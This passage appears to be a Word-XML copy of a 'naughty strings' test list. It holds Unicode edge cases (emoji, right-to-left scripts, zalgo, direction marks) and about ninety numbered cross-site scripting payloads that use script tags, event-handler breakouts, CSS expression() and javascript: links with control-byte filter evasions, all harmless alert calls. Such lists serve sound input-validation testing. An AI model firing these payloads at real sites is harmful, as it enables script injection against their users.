      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ß</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ª</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ą</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ñ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">丂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">㐀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𠀀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ⱥ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ⱦ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(｡◕ ∀ ◕｡)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">｀ｨ(´∀｀∩</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">__ﾛ(,_,*)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">・(￣∀￣)・:*:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">,。・:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">:・゜’( ☻ ω ☻ )。・:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:・゜’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(╯°□°）╯︵ ┻━┻)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(ﾉಥ益ಥ）ﾉ﻿ ┻━┻</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">┬─┬ノ( º _ ºノ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">( ͡° ͜ʖ ͡°)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¯_(ツ)_/¯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">😍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👩🏽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👾 🙇 💁 🙅 🙆 🙋 🙎 🙍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🐵 🙈 🙉 🙊</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸🇦🇫🇦🇲</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸🇦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">１２３</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">١٢٣</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">הָיְתָהtestالصفحات التّحول</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">﷽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ﷺ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">الكل في المجمو عة (5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">᚛                 ᚜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‪‪test‪</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‫test‫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"> test </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">test⁠test‫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁦test⁧</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">00˙Ɩ$-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;alert('1');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"&gt;&lt;script&gt;alert(4)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;alert(5)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt; / script &gt;&lt; script &gt;alert(8)&lt; / script &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">onfocus=JaVaSCript:alert(9) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">" onfocus=JaVaSCript:alert(10) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' onfocus=JaVaSCript:alert(11) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">＜script＞alert(12)＜/script＞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–&gt;&lt;script&gt;alert(14)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“;alert(15);t=”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‘;alert(16);t=’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">JavaSCript:alert(17)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">;alert(18);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">src=JaVaSCript:prompt(19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“&gt;&lt;script&gt;alert(20);&lt;/script x=”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‘&gt;&lt;script&gt;alert(21);&lt;/script x=’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">" autofocus onkeyup="javascript:alert(23)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' autofocus onkeyup='javascript:alert(24)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x20type=“text/javascript”&gt;javascript:alert(25);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x3Etype=“text/javascript”&gt;javascript:alert(26);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Dtype=“text/javascript”&gt;javascript:alert(27);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x09type=“text/javascript”&gt;javascript:alert(28);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Ctype=“text/javascript”&gt;javascript:alert(29);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x2Ftype=“text/javascript”&gt;javascript:alert(30);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;script\x0Atype=“text/javascript”&gt;javascript:alert(31);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'`"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'`"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x\x3Aexpression(javascript:alert(34)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:expression\x5C(javascript:alert(35)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:expression\x00(javascript:alert(36)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:exp\x00ression(javascript:alert(37)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x09expression(javascript:alert(40)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x20expression(javascript:alert(50)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x00expression(javascript:alert(52)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x05javascript:javascript:alert(64)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x18javascript:javascript:alert(66)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x11javascript:javascript:alert(67)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x17javascript:javascript:alert(71)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x03javascript:javascript:alert(72)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x00javascript:javascript:alert(75)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x10javascript:javascript:alert(76)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x20javascript:javascript:alert(78)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x13javascript:javascript:alert(79)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x09javascript:javascript:alert(80)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x14javascript:javascript:alert(82)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x19javascript:javascript:alert(83)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x81javascript:javascript:alert(86)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x1Djavascript:javascript:alert(87)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE2\x80\x87javascript:javascript:alert(88)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\x07javascript:javascript:alert(89)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id="fuzzelement1"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
